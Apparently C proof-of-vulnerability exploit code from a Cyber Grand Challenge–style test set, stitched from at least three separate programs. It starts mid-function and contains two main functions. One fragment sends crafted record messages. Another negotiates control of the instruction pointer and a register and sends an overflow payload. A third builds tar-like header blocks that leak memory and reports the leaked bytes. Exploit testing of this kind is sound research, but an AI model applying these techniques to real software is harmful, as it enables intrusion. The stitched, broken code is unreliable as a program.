static unsigned char write_00000_00000[] =
"\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x1f\xbc\x00\x00\x00\x4d\x66\x59"
"\x55\x54\x78\x58\x53\x6e\x49\x53\x70\x54\x58\x43\x75\x65\x79\x6a"
"\x7a\x50\x47\x63\x52\x59\x6c\x6e\x61\x70\x63\x76";
static unsigned int write_00000_00000_len = 44;
unsigned char *write_00000 = NULL;
unsigned int write_00000_len = 0;
write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len);
if (write_00000_len > 0) {
transmit_all(1, write_00000, write_00000_len);
}
free(write_00000);
} while (0);
do {
unsigned char *read_00000;
unsigned int read_00000_len;
unsigned int read_00000_ptr = 0;
//**** length read
read_00000_len = 4;
read_00000 = (unsigned char*)malloc(read_00000_len);
int read_00000_res = length_read(0, read_00000, read_00000_len);
if (read_00000_res) {} //silence unused variable warning
free(read_00000);
if (read_00000_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00001_00000[] =
"\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x2e\xa5\x00\x00\x34\x1f\x4c\x57"
"\x68\x6e\x42\x69\x58\x73\x51\x66\x4e\x4c\x74\x65\x44\x42\x54\x67"
"\x76\x57\x4b\x74\x75\x46\x44\x49\x4c\x57\x4b\x73";
static unsigned int write_00001_00000_len = 44;
unsigned char *write_00001 = NULL;
unsigned int write_00001_len = 0;
write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len);
if (write_00001_len > 0) {
transmit_all(1, write_00001, write_00001_len);
}
free(write_00001);
} while (0);
do {
unsigned char *read_00001;
unsigned int read_00001_len;
unsigned int read_00001_ptr = 0;
//**** length read
read_00001_len = 4;
read_00001 = (unsigned char*)malloc(read_00001_len);
int read_00001_res = length_read(0, read_00001, read_00001_len);
if (read_00001_res) {} //silence unused variable warning
free(read_00001);
if (read_00001_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data (parent1)
static unsigned char write_00002_00000[] =
"\xa0\xa1\xa2\xa3\x24\x00\x00\x00\xd8\xc0\x00\x00\x75\x6a\x6d\x53"
"\x4d\x68\x53\x69\x58\x71\x61\x63\x55\x5a\x6b\x44\x4d\x43\x65\x41"
"\x50\x4f\x5a\x75\x4b\x56\x4a\x63\x77\x48\x6d\x47";
static unsigned int write_00002_00000_len = 44;
unsigned char *write_00002 = NULL;
unsigned int write_00002_len = 0;
write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len);
if (write_00002_len > 0) {
transmit_all(1, write_00002, write_00002_len);
}
free(write_00002);
} while (0);
do {
unsigned char *read_00002;
unsigned int read_00002_len;
unsigned int read_00002_ptr = 0;
//**** length read
read_00002_len = 4;
read_00002 = (unsigned char*)malloc(read_00002_len);
int read_00002_res = length_read(0, read_00002, read_00002_len);
if (read_00002_res) {} //silence unused variable warning
free(read_00002);
if (read_00002_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00003_00000[] =
"\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x29\x66\x00\x00\x99\x7a\x73\x75"
"\x75\x65\x6e\x49\x51\x4d\x6a\x73\x47\x48\x57\x76\x4f\x4c\x43\x64"
"\x72\x42\x41\x4d\x6b\x6e\x7a\x75\x6c\x4f\x52\x5a";
static unsigned int write_00003_00000_len = 44;
unsigned char *write_00003 = NULL;
unsigned int write_00003_len = 0;
write_00003 = append_buf(write_00003, &write_00003_len, write_00003_00000, write_00003_00000_len);
if (write_00003_len > 0) {
transmit_all(1, write_00003, write_00003_len);
}
free(write_00003);
} while (0);
do {
unsigned char *read_00003;
unsigned int read_00003_len;
unsigned int read_00003_ptr = 0;
//**** length read
read_00003_len = 4;
read_00003 = (unsigned char*)malloc(read_00003_len);
int read_00003_res = length_read(0, read_00003, read_00003_len);
if (read_00003_res) {} //silence unused variable warning
free(read_00003);
if (read_00003_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00004_00000[] =
"\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x73\xd3\x00\x00\x90\x1d\x54\x68"
"\x44\x4d\x70\x55\x4b\x74\x4c\x43\x72\x4e\x76\x4e\x79\x4f\x7a\x72"
"\x4b\x64\x49\x65\x59\x55\x61\x46\x4c\x50\x52\x45";
static unsigned int write_00004_00000_len = 44;
unsigned char *write_00004 = NULL;
unsigned int write_00004_len = 0;
write_00004 = append_buf(write_00004, &write_00004_len, write_00004_00000, write_00004_00000_len);
if (write_00004_len > 0) {
transmit_all(1, write_00004, write_00004_len);
}
free(write_00004);
} while (0);
do {
unsigned char *read_00004;
unsigned int read_00004_len;
unsigned int read_00004_ptr = 0;
//**** length read
read_00004_len = 4;
read_00004 = (unsigned char*)malloc(read_00004_len);
int read_00004_res = length_read(0, read_00004, read_00004_len);
if (read_00004_res) {} //silence unused variable warning
free(read_00004);
if (read_00004_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data (parent2)
static unsigned char write_00005_00000[] =
"\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x6c\x13\x00\x00\xc6\x5d\x50\x51"
"\x66\x47\x50\x57\x79\x78\x6e\x54\x75\x77\x5a\x64\x4f\x66\x70\x72"
"\x48\x67\x70\x72\x79\x6b\x75\x50\x6c\x63\x6b\x50";
static unsigned int write_00005_00000_len = 44;
unsigned int *buf = (unsigned int *)write_00005_00000;
buf[2] = p2_val;
unsigned char *write_00005 = NULL;
unsigned int write_00005_len = 0;
write_00005 = append_buf(write_00005, &write_00005_len, write_00005_00000, write_00005_00000_len);
if (write_00005_len > 0) {
transmit_all(1, write_00005, write_00005_len);
}
free(write_00005);
} while (0);
do {
unsigned char *read_00005;
unsigned int read_00005_len;
unsigned int read_00005_ptr = 0;
//**** length read
read_00005_len = 4;
read_00005 = (unsigned char*)malloc(read_00005_len);
int read_00005_res = length_read(0, read_00005, read_00005_len);
if (read_00005_res) {} //silence unused variable warning
free(read_00005);
if (read_00005_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00006_00000[] =
"\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x6e\xc5\x00\x00\x72\xc5\x42\x6d"
"\x4e\x49\x6e\x54\x51\x6c\x75\x44\x5a\x6c\x57\x43\x71\x6f\x4a\x6f"
"\x61\x4c\x49\x51\x66\x4d\x75\x47\x6b\x43\x55\x63";
static unsigned int write_00006_00000_len = 44;
unsigned char *write_00006 = NULL;
unsigned int write_00006_len = 0;
write_00006 = append_buf(write_00006, &write_00006_len, write_00006_00000, write_00006_00000_len);
if (write_00006_len > 0) {
transmit_all(1, write_00006, write_00006_len);
}
free(write_00006);
} while (0);
do {
unsigned char *read_00006;
unsigned int read_00006_len;
unsigned int read_00006_ptr = 0;
//**** length read
read_00006_len = 4;
read_00006 = (unsigned char*)malloc(read_00006_len);
int read_00006_res = length_read(0, read_00006, read_00006_len);
if (read_00006_res) {} //silence unused variable warning
free(read_00006);
if (read_00006_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00007_00000[] =
"\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x3e\xc0\x00\x00\x51\xb2\x70\x79"
"\x44\x59\x77\x67\x67\x57\x48\x65\x53\x4f\x76\x55\x77\x61\x65\x75"
"\x68\x6b\x71\x71\x61\x52\x4b\x48\x55\x63\x6d\x52";
static unsigned int write_00007_00000_len = 44;
unsigned char *write_00007 = NULL;
unsigned int write_00007_len = 0;
write_00007 = append_buf(write_00007, &write_00007_len, write_00007_00000, write_00007_00000_len);
if (write_00007_len > 0) {
transmit_all(1, write_00007, write_00007_len);
}
free(write_00007);
} while (0);
do {
unsigned char *read_00007;
unsigned int read_00007_len;
unsigned int read_00007_ptr = 0;
//**** length read
read_00007_len = 4;
read_00007 = (unsigned char*)malloc(read_00007_len);
int read_00007_res = length_read(0, read_00007, read_00007_len);
if (read_00007_res) {} //silence unused variable warning
free(read_00007);
if (read_00007_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data (parent3)
static unsigned char write_00008_00000[] =
"\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x82\x24\x00\x00\xa9\x7c\x70\x41"
"\x4e\x45\x62\x78\x44\x6b\x64\x4d\x46\x47\x76\x6f\x51\x4a\x51\x68"
"\x76\x4d\x6d\x5a\x57\x5a\x73\x6e\x77\x57\x71\x61";
static unsigned int write_00008_00000_len = 44;
unsigned int *buf = (unsigned int *)write_00008_00000;
buf[2] = p3_val;
unsigned char *write_00008 = NULL;
unsigned int write_00008_len = 0;
write_00008 = append_buf(write_00008, &write_00008_len, write_00008_00000, write_00008_00000_len);
if (write_00008_len > 0) {
transmit_all(1, write_00008, write_00008_len);
}
free(write_00008);
} while (0);
do {
unsigned char *read_00008;
unsigned int read_00008_len;
unsigned int read_00008_ptr = 0;
//**** length read
read_00008_len = 4;
read_00008 = (unsigned char*)malloc(read_00008_len);
int read_00008_res = length_read(0, read_00008, read_00008_len);
if (read_00008_res) {} //silence unused variable warning
free(read_00008);
if (read_00008_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00009_00000[] =
"\xa0\xa1\xa2\xa3\x24\x00\x00\x00\xa8\x13\x00\x00\x4b\x68\x62\x6c"
"\x53\x6f\x79\x46\x64\x76\x5a\x44\x73\x42\x56\x6d\x4d\x6b\x7a\x42"
"\x66\x69\x44\x73\x74\x6b\x61\x6e\x71\x68\x66\x41";
static unsigned int write_00009_00000_len = 44;
unsigned char *write_00009 = NULL;
unsigned int write_00009_len = 0;
write_00009 = append_buf(write_00009, &write_00009_len, write_00009_00000, write_00009_00000_len);
if (write_00009_len > 0) {
transmit_all(1, write_00009, write_00009_len);
}
free(write_00009);
} while (0);
do {
unsigned char *read_00009;
unsigned int read_00009_len;
unsigned int read_00009_ptr = 0;
//**** length read
read_00009_len = 4;
read_00009 = (unsigned char*)malloc(read_00009_len);
int read_00009_res = length_read(0, read_00009, read_00009_len);
if (read_00009_res) {} //silence unused variable warning
free(read_00009);
if (read_00009_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00010_00000[] =
"\xa0\xa1\xa2\xa3\x24\x00\x00\x00\xe1\x79\x01\x00\x74\xf8\x4c\x59"
"\x73\x5a\x64\x42\x4d\x48\x44\x45\x6a\x56\x76\x4d\x79\x6f\x49\x4d"
"\x79\x63\x41\x50\x45\x69\x75\x4c\x78\x6d\x73\x4b";
static unsigned int write_00010_00000_len = 44;
unsigned char *write_00010 = NULL;
unsigned int write_00010_len = 0;
write_00010 = append_buf(write_00010, &write_00010_len, write_00010_00000, write_00010_00000_len);
if (write_00010_len > 0) {
transmit_all(1, write_00010, write_00010_len);
}
free(write_00010);
} while (0);
do {
unsigned char *read_00010;
unsigned int read_00010_len;
unsigned int read_00010_ptr = 0;
//**** length read
read_00010_len = 4;
read_00010 = (unsigned char*)malloc(read_00010_len);
int read_00010_res = length_read(0, read_00010, read_00010_len);
if (read_00010_res) {} //silence unused variable warning
free(read_00010);
if (read_00010_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00011_00000[] =
"\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x71\xe1\x00\x00\x05\x0e\x69\x77"
"\x6f\x65\x69\x64\x53\x6b\x68\x4f\x51\x69\x75\x66\x57\x54\x54\x4b"
"\x41\x67\x53\x71\x43\x41\x79\x48\x7a\x72\x73\x68";
static unsigned int write_00011_00000_len = 44;
unsigned char *write_00011 = NULL;
unsigned int write_00011_len = 0;
write_00011 = append_buf(write_00011, &write_00011_len, write_00011_00000, write_00011_00000_len);
if (write_00011_len > 0) {
transmit_all(1, write_00011, write_00011_len);
}
free(write_00011);
} while (0);
do {
unsigned char *read_00011;
unsigned int read_00011_len;
unsigned int read_00011_ptr = 0;
//**** length read
read_00011_len = 4;
read_00011 = (unsigned char*)malloc(read_00011_len);
int read_00011_res = length_read(0, read_00011, read_00011_len);
if (read_00011_res) {} //silence unused variable warning
free(read_00011);
if (read_00011_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data union parent1, parent2
static unsigned char write_00012_00000[] =
"\xf0\xf1\xf2\xf3\x08\x00\x00\x00\xd8\xc0\x00\x00\x6c\x13\x00\x00";
static unsigned int write_00012_00000_len = 16;
unsigned int *buf = (unsigned int *)write_00012_00000;
buf[3] = p2_val;
unsigned char *write_00012 = NULL;
unsigned int write_00012_len = 0;
write_00012 = append_buf(write_00012, &write_00012_len, write_00012_00000, write_00012_00000_len);
if (write_00012_len > 0) {
transmit_all(1, write_00012, write_00012_len);
}
free(write_00012);
} while (0);
do {
unsigned char *read_00012;
unsigned int read_00012_len;
unsigned int read_00012_ptr = 0;
//**** length read
read_00012_len = 4;
read_00012 = (unsigned char*)malloc(read_00012_len);
int read_00012_res = length_read(0, read_00012, read_00012_len);
if (read_00012_res) {} //silence unused variable warning
free(read_00012);
if (read_00012_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data adopted child child, parent1, parent2
static unsigned char write_00013_00000[] =
"\xac\xac\xac\xac\x0c\x00\x00\x00\x1f\xbc\x00\x00\xd8\xc0\x00\x00"
"\x6c\x13\x00\x00";
static unsigned int write_00013_00000_len = 20;
unsigned int *buf = (unsigned int *)write_00013_00000;
buf[4] = p2_val;
unsigned char *write_00013 = NULL;
unsigned int write_00013_len = 0;
write_00013 = append_buf(write_00013, &write_00013_len, write_00013_00000, write_00013_00000_len);
if (write_00013_len > 0) {
transmit_all(1, write_00013, write_00013_len);
}
free(write_00013);
} while (0);
do {
unsigned char *read_00013;
unsigned int read_00013_len;
unsigned int read_00013_ptr = 0;
//**** length read
read_00013_len = 4;
read_00013 = (unsigned char*)malloc(read_00013_len);
int read_00013_res = length_read(0, read_00013, read_00013_len);
if (read_00013_res) {} //silence unused variable warning
free(read_00013);
if (read_00013_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data separated parent1, parent2
static unsigned char write_00014_00000[] =
"\x50\x11\x50\x11\x08\x00\x00\x00\xd8\xc0\x00\x00\x6c\x13\x00\x00";
static unsigned int write_00014_00000_len = 16;
unsigned int *buf = (unsigned int *)write_00014_00000;
buf[3] = p2_val;
unsigned char *write_00014 = NULL;
unsigned int write_00014_len = 0;
write_00014 = append_buf(write_00014, &write_00014_len, write_00014_00000, write_00014_00000_len);
if (write_00014_len > 0) {
transmit_all(1, write_00014, write_00014_len);
}
free(write_00014);
} while (0);
do {
unsigned char *read_00014;
unsigned int read_00014_len;
unsigned int read_00014_ptr = 0;
//**** length read
read_00014_len = 4;
read_00014 = (unsigned char*)malloc(read_00014_len);
int read_00014_res = length_read(0, read_00014, read_00014_len);
if (read_00014_res) {} //silence unused variable warning
free(read_00014);
if (read_00014_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data union parent2, parent3
static unsigned char write_00015_00000[] =
"\xf0\xf1\xf2\xf3\x08\x00\x00\x00\x6c\x13\x00\x00\x82\x24\x00\x00";
static unsigned int write_00015_00000_len = 16;
unsigned int *buf = (unsigned int *)write_00015_00000;
buf[2] = p2_val;
buf[3] = p3_val;
unsigned char *write_00015 = NULL;
unsigned int write_00015_len = 0;
write_00015 = append_buf(write_00015, &write_00015_len, write_00015_00000, write_00015_00000_len);
if (write_00015_len > 0) {
transmit_all(1, write_00015, write_00015_len);
}
free(write_00015);
} while (0);
do {
unsigned char *read_00015;
unsigned int read_00015_len;
unsigned int read_00015_ptr = 0;
//**** length read
read_00015_len = 4;
read_00015 = (unsigned char*)malloc(read_00015_len);
int read_00015_res = length_read(0, read_00015, read_00015_len);
if (read_00015_res) {} //silence unused variable warning
free(read_00015);
if (read_00015_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data separated parent2, parent3
static unsigned char write_00016_00000[] =
"\x50\x11\x50\x11\x08\x00\x00\x00\x6c\x13\x00\x00\x82\x24\x00\x00";
static unsigned int write_00016_00000_len = 16;
unsigned int *buf = (unsigned int *)write_00016_00000;
buf[2] = p2_val;
buf[3] = p3_val;
unsigned char *write_00016 = NULL;
unsigned int write_00016_len = 0;
write_00016 = append_buf(write_00016, &write_00016_len, write_00016_00000, write_00016_00000_len);
if (write_00016_len > 0) {
transmit_all(1, write_00016, write_00016_len);
}
free(write_00016);
} while (0);
do {
unsigned char *read_00016;
unsigned int read_00016_len;
unsigned int read_00016_ptr = 0;
//**** length read
read_00016_len = 4;
read_00016 = (unsigned char*)malloc(read_00016_len);
int read_00016_res = length_read(0, read_00016, read_00016_len);
if (read_00016_res) {} //silence unused variable warning
free(read_00016);
if (read_00016_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data adopted child child, p_unk, parent2
static unsigned char write_00017_00000[] =
"\xac\xac\xac\xac\x0c\x00\x00\x00\x1f\xbc\x00\x00\x00\x00\x00\x00"
"\x6c\x13\x00\x00";
static unsigned int write_00017_00000_len = 20;
unsigned int *buf = (unsigned int *)write_00017_00000;
buf[4] = p2_val;
unsigned char *write_00017 = NULL;
unsigned int write_00017_len = 0;
write_00017 = append_buf(write_00017, &write_00017_len, write_00017_00000, write_00017_00000_len);
if (write_00017_len > 0) {
transmit_all(1, write_00017, write_00017_len);
}
free(write_00017);
} while (0);
do {
unsigned char *read_00017;
unsigned int read_00017_len;
unsigned int read_00017_ptr = 0;
//**** length read
read_00017_len = 4;
read_00017 = (unsigned char*)malloc(read_00017_len);
int read_00017_res = length_read(0, read_00017, read_00017_len);
if (read_00017_res) {} //silence unused variable warning
free(read_00017);
if (read_00017_ptr) {} //silence unused variable warning if any
} while (0);
}
int main(void) {
type1_vals t1vals;
type1_negotiate(0xedededed, 0xedededed, 7, &t1vals); // can use either EAX(0) or EDI(7)
unsigned int no_ed = 0x12121212; // have to prevent 0xed from each byte of EIP and REG
do {
//*** writing data
static unsigned char write_00000_00000[] =
"\xad\xdd\xad\xdd";
static unsigned int write_00000_00000_len = 4;
unsigned char *write_00000 = NULL;
unsigned int write_00000_len = 0;
write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len);
if (write_00000_len > 0) {
transmit_all(1, write_00000, write_00000_len);
}
free(write_00000);
} while (0);
do {
//*** writing data
static unsigned char write_00001_00000[] =
"\x38\x31\x39\x36\x33\x38\x39\x30";
static unsigned int write_00001_00000_len = 8;
unsigned char *write_00001 = NULL;
unsigned int write_00001_len = 0;
write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len);
if (write_00001_len > 0) {
transmit_all(1, write_00001, write_00001_len);
}
free(write_00001);
} while (0);
do {
//*** writing data
static unsigned char write_00002_00000[] =
"\x8c\xdc\x00\x00\x14\xae\x07\x41\x47\x71\x56\x59\x4e\x4e\x43\x54"
"\x64\x46\x54\x6f\x4a\x67\x62\x6e\x4b\x56\x73\x4e\x72\x4a\x54\x72"
"\x42\x45\x44\x65\x50\x57\x7a\x53\x4b\x6a\x51\x51\x68\x75\x53\x6f"
"\x74\x75\x71\x49\x4a\x70\x63\x67\x52\x49\x76\x74\x4a\x70\x49\x4d"
"\x4c\x4b\x62\x71\x44\x79\x76\x6a\x4f\x53\x41\x47\x66\x75\x46\x6c"
"\x4f\x41\x51\x66\x54\x4d\x64\x4e\x4d\x7a\x52\x56\x43\x48\x78\x64"
"\x4a\x43\x5a\x53\x4a\x52\x52\x61\x4c\x63\x7a\x43\x41\x69\x6c\x66"
"\x4f\x76\x64\x62\x6e\x4b\x6e\x48\x77\x6a\x51\x43\x7a\x6c\x4a\x61"
"\x66\x4f\x47\x68\x6a\x5a\x5a\x41";
static unsigned int write_00002_00000_len = 136;
unsigned char *write_00002 = NULL;
unsigned int write_00002_len = 0;
write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len);
if (write_00002_len > 0) {
transmit_all(1, write_00002, write_00002_len);
}
free(write_00002);
} while (0);
do { // EAX (have to prevent 0xed frm each of the 4 bytes)
//*** writing data
unsigned int reg = t1vals.regval | no_ed;
unsigned char *write_00003 = NULL;
unsigned int write_00003_len = 0;
write_00003 = append_buf(write_00003, &write_00003_len, (unsigned char*)®, 4);
if (write_00003_len > 0) {
transmit_all(1, write_00003, write_00003_len);
}
free(write_00003);
} while (0);
do {
//*** writing data
static unsigned char write_00004_00000[] =
"\x43\x43\x43\x43";
static unsigned int write_00004_00000_len = 4;
unsigned char *write_00004 = NULL;
unsigned int write_00004_len = 0;
write_00004 = append_buf(write_00004, &write_00004_len, write_00004_00000, write_00004_00000_len);
if (write_00004_len > 0) {
transmit_all(1, write_00004, write_00004_len);
}
free(write_00004);
} while (0);
do { // EIP (have to prevent 0xed from each of the 4 bytes)
//*** writing data
unsigned int eip = t1vals.ipval | no_ed;
unsigned char *write_00005 = NULL;
unsigned int write_00005_len = 0;
write_00005 = append_buf(write_00005, &write_00005_len, (unsigned char*)&eip, 4);
if (write_00005_len > 0) {
transmit_all(1, write_00005, write_00005_len);
}
free(write_00005);
} while (0);
do {
//*** writing data
static unsigned char write_00006_00000[] =
"\xed";
static unsigned int write_00006_00000_len = 1;
unsigned char *write_00006 = NULL;
unsigned int write_00006_len = 0;
write_00006 = append_buf(write_00006, &write_00006_len, write_00006_00000, write_00006_00000_len);
if (write_00006_len > 0) {
transmit_all(1, write_00006, write_00006_len);
}
free(write_00006);
} while (0);
do {
unsigned char *read_00000;
unsigned int read_00000_len;
unsigned int read_00000_ptr = 0;
//**** length cgc_read
read_00000_len = 2;
read_00000 = (unsigned char*)malloc(read_00000_len);
int read_00000_res = length_read(0, read_00000, read_00000_len);
if (read_00000_res) {} //silence unused variable warning
free(read_00000);
if (read_00000_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00007_00000[] =
"\xc4\xec\x4e\xee";
static unsigned int write_00007_00000_len = 4;
unsigned char *write_00007 = NULL;
unsigned int write_00007_len = 0;
write_00007 = append_buf(write_00007, &write_00007_len, write_00007_00000, write_00007_00000_len);
if (write_00007_len > 0) {
transmit_all(1, write_00007, write_00007_len);
}
free(write_00007);
} while (0);
do {
//*** writing data
static unsigned char write_00008_00000[] =
"\x38\x31\x39\x36\x33\x38\x39\x30";
static unsigned int write_00008_00000_len = 8;
unsigned char *write_00008 = NULL;
unsigned int write_00008_len = 0;
write_00008 = append_buf(write_00008, &write_00008_len, write_00008_00000, write_00008_00000_len);
if (write_00008_len > 0) {
transmit_all(1, write_00008, write_00008_len);
}
free(write_00008);
} while (0);
do {
unsigned char *read_00001;
unsigned int read_00001_len;
unsigned int read_00001_ptr = 0;
//**** length cgc_read
read_00001_len = 4;
read_00001 = (unsigned char*)malloc(read_00001_len);
int read_00001_res = length_read(0, read_00001, read_00001_len);
if (read_00001_res) {} //silence unused variable warning
free(read_00001);
if (read_00001_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00002;
unsigned int read_00002_len;
unsigned int read_00002_ptr = 0;
//**** length cgc_read
read_00002_len = 4;
read_00002 = (unsigned char*)malloc(read_00002_len);
int read_00002_res = length_read(0, read_00002, read_00002_len);
if (read_00002_res) {} //silence unused variable warning
free(read_00002);
if (read_00002_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00003;
unsigned int read_00003_len;
unsigned int read_00003_ptr = 0;
//**** length cgc_read
read_00003_len = 141;
read_00003 = (unsigned char*)malloc(read_00003_len);
int read_00003_res = length_read(0, read_00003, read_00003_len);
if (read_00003_res) {} //silence unused variable warning
//**** cgc_read match data
static unsigned char match_00003_00000[] =
"\x47\x71\x56\x59\x4e\x4e\x43\x54\x64\x46\x54\x6f\x4a\x67\x62\x6e"
"\x4b\x56\x73\x4e\x72\x4a\x54\x72\x42\x45\x44\x65\x50\x57\x7a\x53"
"\x4b\x6a\x51\x51\x68\x75\x53\x6f\x74\x75\x71\x49\x4a\x70\x63\x67"
"\x52\x49\x76\x74\x4a\x70\x49\x4d\x4c\x4b\x62\x71\x44\x79\x76\x6a"
"\x4f\x53\x41\x47\x66\x75\x46\x6c\x4f\x41\x51\x66\x54\x4d\x64\x4e"
"\x4d\x7a\x52\x56\x43\x48\x78\x64\x4a\x43\x5a\x53\x4a\x52\x52\x61"
"\x4c\x63\x7a\x43\x41\x69\x6c\x66\x4f\x76\x64\x62\x6e\x4b\x6e\x48"
"\x77\x6a\x51\x43\x7a\x6c\x4a\x61\x66\x4f\x47\x68\x6a\x5a\x5a\x41"
"\x4d\x4d\x4d\x4d\x43\x43\x43\x43\x45\x45\x45\x45\xed";
read_00003_ptr += data_match(read_00003 + read_00003_ptr, read_00003_len - read_00003_ptr, match_00003_00000, 141);
free(read_00003);
if (read_00003_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00004;
unsigned int read_00004_len;
unsigned int read_00004_ptr = 0;
//**** length cgc_read
read_00004_len = 2;
read_00004 = (unsigned char*)malloc(read_00004_len);
int read_00004_res = length_read(0, read_00004, read_00004_len);
if (read_00004_res) {} //silence unused variable warning
free(read_00004);
if (read_00004_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00009_00000[] =
"\xff\xff\xff\xff";
static unsigned int write_00009_00000_len = 4;
unsigned char *write_00009 = NULL;
unsigned int write_00009_len = 0;
write_00009 = append_buf(write_00009, &write_00009_len, write_00009_00000, write_00009_00000_len);
if (write_00009_len > 0) {
transmit_all(1, write_00009, write_00009_len);
}
free(write_00009);
} while (0);
do {
unsigned char *read_00005;
unsigned int read_00005_len;
unsigned int read_00005_ptr = 0;
//**** length cgc_read
read_00005_len = 2;
read_00005 = (unsigned char*)malloc(read_00005_len);
int read_00005_res = length_read(0, read_00005, read_00005_len);
if (read_00005_res) {} //silence unused variable warning
free(read_00005);
if (read_00005_ptr) {} //silence unused variable warning if any
} while (0);
}
int main(void) {
int base = 0x4347C000;
#if 1
int pov_type = 2;
int size = 0;
int length = 0;
length_read(0, NULL, 0x1000 / 4);
// negotiate type 2
transmit_all(3, &pov_type, sizeof(pov_type));
if (length_read(3, (unsigned char *)&base, sizeof(base)) != sizeof(base))
{
return -1;
}
if (length_read(3, (unsigned char *)&size, sizeof(size)) != sizeof(size))
{
return -1;
}
if (length_read(3, (unsigned char *)&length, sizeof(length)) != sizeof(length))
{
return -1;
}
#endif
int ref = 0x0804d7a0;
int offset = (base - ref);
int gid = 256 + 512;
int uid = offset / gid + 1;
glue_t *block = malloc(sizeof(glue_t));
cgc_memset(block, '\0', sizeof(glue_t));
for (int i = 8 - 2; i >= 0; i--)
{
block->gid[i] = 0x30 + gid % 8;
gid /= 8;
}
for (int i = 8 - 2; i >= 0; i--)
{
block->uid[i] = 0x30 + uid % 8;
uid /= 8;
}
strcpy(block->f_name, "this is a test");
strcpy(block->f_mode, "07000");
strcpy(block->f_size, "0");
char zero[BLOCK_SIZE] = {0};
transmit_all(1, block, sizeof(glue_t));
transmit_all(1, zero, BLOCK_SIZE - sizeof(glue_t));
// 2 empty blocks
cgc_memset(block, '\0', sizeof(glue_t));
transmit_all(1, block, sizeof(glue_t));
transmit_all(1, zero, BLOCK_SIZE - sizeof(glue_t));
transmit_all(1, block, sizeof(glue_t));
transmit_all(1, zero, BLOCK_SIZE - sizeof(glue_t));
char leaked[4];
length_read(0, (unsigned char *)zero, 4 * 22 - 1);
length_read(0, (unsigned char *)leaked, sizeof(leaked));
transmit_all(3, (unsigned char *)leaked, sizeof(leaked));
return 0;
}
